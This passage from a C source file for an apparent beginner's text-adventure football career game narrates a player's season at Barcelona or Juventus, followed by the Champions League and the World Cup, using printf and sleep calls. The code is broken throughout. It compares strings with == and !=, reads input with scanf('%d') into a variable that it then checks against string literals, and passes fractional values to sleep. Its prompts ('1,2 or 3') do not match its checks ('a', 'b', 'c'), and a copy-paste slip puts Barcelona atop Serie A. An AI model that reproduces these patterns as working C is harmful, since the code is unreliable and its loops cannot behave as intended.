round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Ronaldo to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("EPL best defender.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("EPL trophy.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Champions League Trophy.\n"); }else{ printf("Incorrect. Try again!\n"); } }while(position!="a"&& position!="b"&& position!="c"); } } void option2(){ //league2 if(league=="b"){ printf("*On plane to Spain*\n"); sleep(3); printf("He starts his tryout at Barcelona F.C\n"); sleep(3); printf("At the beginning, Ernesto Valverde(The manager) said to %s:\"This is gonna be a hard\"\n", name1); printf("tryout so just try your best to let me see what you got,okay?\"\n"); sleep(3); printf("You said: Yes coach \n"); sleep(1); printf("***The tryout is happening***\n"); printf("Please wait for the processing\n"); sleep(4); printf("After the tryout finished, %s got chosen!\n",name1); sleep(3); printf("Ernesto Valverde: \"Now you guys are the chosen\"\n"); sleep(1); printf("Ernesto Valverde: \"What position do you wanna play, %s?\"\n",name1); sleep(3); printf("Please select 1 position that your character will play(1,2 or 3)!\n"); sleep(2.5); printf("1.Forward 2.Midfield 3.Back\n"); do{ scanf("%d",&position); sleep(2); if(position=="a"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Forward~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Barcelona F.C is facing against Real Madrid with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Luis Suárez at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Barcelona's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Barcelona got on the 3rd place of the La Liga leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Barcelona gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Barcelona only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Manchester United\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s\n",name1); sleep(3); printf("\"Barcelona finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Ajax in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against Belgium in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Argentina in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Messi to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("La Liga top scorer.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("3rd place La Liga.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("European Golden Shoes(Score the most in Europe).\n"); } else if(position=="b"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Midfield~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Barcelona F.C is facing against Atlético Madrid with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Messi at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Wonderful assist from %s\n",name1); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 80'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Barcelona's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Barcelona got on the top of the La Liga leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Barcelona gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Barcelona only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Liverpool\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is assisted by %s\n",name1); sleep(3); printf("\"Barcelona finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Napoli in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...\n"); sleep(3); printf("~~Congratulations!! You win Champions League's cup this year~~\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s can't beat Ronaldo to get into the semi-final round!\n",name1); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("La Liga top assister.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("La Liga League trophy.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Champions League winner.\n"); } else if(position=="c"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Back~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Barcelona F.C is facing against Sevilla F.C with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Gerard Piqué at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("What a wonderful tackle from %s\n",name1); sleep(3); printf("He just saved Barcelona from a dangerous goal\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Barcelona's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Barcelona got on 2nd place of the La Liga leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Barcelona gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Barcelona only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Tottenham Hotspur F.C.\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s from a corner kick situation\n",name1); sleep(3); printf("\"Barcelona finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Juventus in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Chelsea in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Barcelona will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s beats Ronaldo to get into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against France in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S beats France with the score 1-0 and get into the final round\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Brazil in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...\n"); sleep(3); printf("Congratulations. You wins the World Cup this year!\n"); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("La Liga best defender.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("2nd place La Liga.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("World Cup winner.\n"); }else{ printf("Incorrect. Try again!\n"); } }while(position!="a"&& position!="b"&& position!="c"); } } void option3(){ //league2 if(league=="c"){ printf("*On plane to Italy*\n"); sleep(3); printf("He starts his tryout at Juventus F.C\n"); sleep(3); printf("At the beginning, Maurizio Sarri(The manager) said to %s:\"This is gonna be a hard\"\n", name1); printf("tryout so just try your best to let me see what you got,okay?\"\n"); sleep(3); printf("You said: Yes coach \n"); sleep(1); printf("***The tryout is happening***\n"); printf("Please wait for the processing\n"); sleep(4); printf("After the tryout finished, %s got chosen!\n",name1); sleep(3); printf("Maurizio Sarri: \"Now you guys are the chosen\"\n"); sleep(1); printf("Maurizio Sarri: \"What position do you wanna play, %s?\"\n",name1); sleep(3); printf("Please select 1 position that your character will play(a,b or c)!\n"); sleep(2.5); printf("a.Forward b.Midfield c.Back\n"); do{ scanf("%d",&position); sleep(2); if(position=="a"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Forward~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Juventus F.C is facing against Napoli with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Higuaín at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Juventus's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Barcelona got on the top of the Serie A leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Juventus gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Juventus only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Manchester United\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is scored by %s\n",name1); sleep(3); printf("\"Juventus finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Ajax in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... \n"); sleep(3); printf("~~Congratulations!! You win Champions League's cup this year~~\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against Belgium in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Argentina in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s beats Messi to get into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against France in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S beats France with the score 1-0 and get into the final round\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Brazil in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...\n"); sleep(3); printf("Congratulations. You wins the World Cup this year!\n"); sleep(3); printf("~~Move to %s's achievements section in this season~~\n",name1); sleep(1); printf("In progressing...\n"); sleep(3.5); printf("To sum up, the achievements that %s has this season are:\n",name1); sleep(3); printf("Serie A top scorer.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Serie A trophy.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("Champions League winner.\n"); sleep(3); printf("~~~~~~~~~~~~~~~\n"); sleep(3); printf("World Cup winner\n"); } else if(position=="b"){ printf("In progressing...\n"); sleep(3); printf("~~~Now, you will play Midfield~~~\n"); sleep(3); printf("***After a few matches***\n"); sleep(3.5); printf("\"Now Juventus F.C is facing against Lazio with the score 0-0\"\n"); sleep(3); printf("\"%s finally get a chance to play on a professional field by switching with Ramsey at 75'\"\n",name1); sleep(3); printf("***5 minutes after %s joined***\n",ans); sleep(3); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("Wonderful assist from %s\n",name1); sleep(3); printf("Now is 1-0\n"); sleep(3); printf("***At 88'***\n"); sleep(3); printf("A\n"); sleep(1); printf("N\n"); sleep(1); printf("O\n"); sleep(1); printf("T\n"); sleep(1); printf("H\n"); sleep(1); printf("E\n"); sleep(1); printf("R\n"); sleep(1); printf("~~~GOOOAAALLLLLL~~~\n"); sleep(3); printf("The match finally ends at the score 2-0\n"); sleep(3); printf("After that match the manager use %s more in Juventus's main squad\n",name1); sleep(3); printf("***After lots of wins, finally Juventus got on 3rd place of the Serie A leaderboard***\n"); sleep(3); printf("~2 months later~\n"); sleep(3); printf("Juventus gets a slot to join into the Champions League\n"); sleep(3); printf("Wait for a second to move to Champions League journey\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~This is CHAMPIONS LEAGUE JOURNEY~~\n"); sleep(4); printf("\"After a few early matches, Juventus only needs one more win to get into the Knock-out round! \"\n"); sleep(3); printf("\"This match is against Liverpool\"\n"); sleep(2); printf("~~~Match in progressing~~~\n"); sleep(3); printf("\"The match ends at 90'+3' with the score 2-0, one of that goal is assisted by %s\n",name1); sleep(3); printf("\"Juventus finally gets into Knock-out round!\"\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Barcelona in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his team continue to win this match and prepare to move into the Quater-finals round\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Napoli in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 3-0 and moves into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against PSG in this round.\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s wins this match with the score 2-0 and moves into the final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("Juventus will face against Real Madrid in this FINAL round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...But your team lost this final round\n"); sleep(3); printf("Prepare to move into World Cup Journey...\n"); sleep(1); printf("~~~In progressing~~~\n"); sleep(3.5); printf("~~~This is WORLD CUP JOURNEY~~~\n"); sleep(2); printf("You are now in the Table round.\n"); sleep(3); printf("The U.S needs one more win to get into the knock-out round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("%s and his national team win this match with the score 2-1 and have a chance to move into the knock-out round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S and %s will face against England in this round!\n",name1); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S wins this match with the score 1-0 and has a chance to get into the quarter-final round!\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Portugal in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends... %s beats Ronaldo to get into the semi-final round!\n",name1); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against France in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("The U.S beats France with the score 1-0 and get into the final round\n"); sleep(3); do{ printf("Type \"OK\" to move into next match!\n"); scanf("%s",&okay); if(okay=="OK"){ printf("In progressing...\n"); }else{ printf("Incorrect. Try again\n"); } }while(okay!="OK"); sleep(3); printf("The U.S will face against Brazil in this round!\n"); sleep(3); printf("~~~Match in progressing~~~\n"); sleep(3); printf("Match ends...\n"); sleep(3); printf("Congratulations. You wins the World Cup this year!\n"); sleep(3); printf("~~Move to %s's 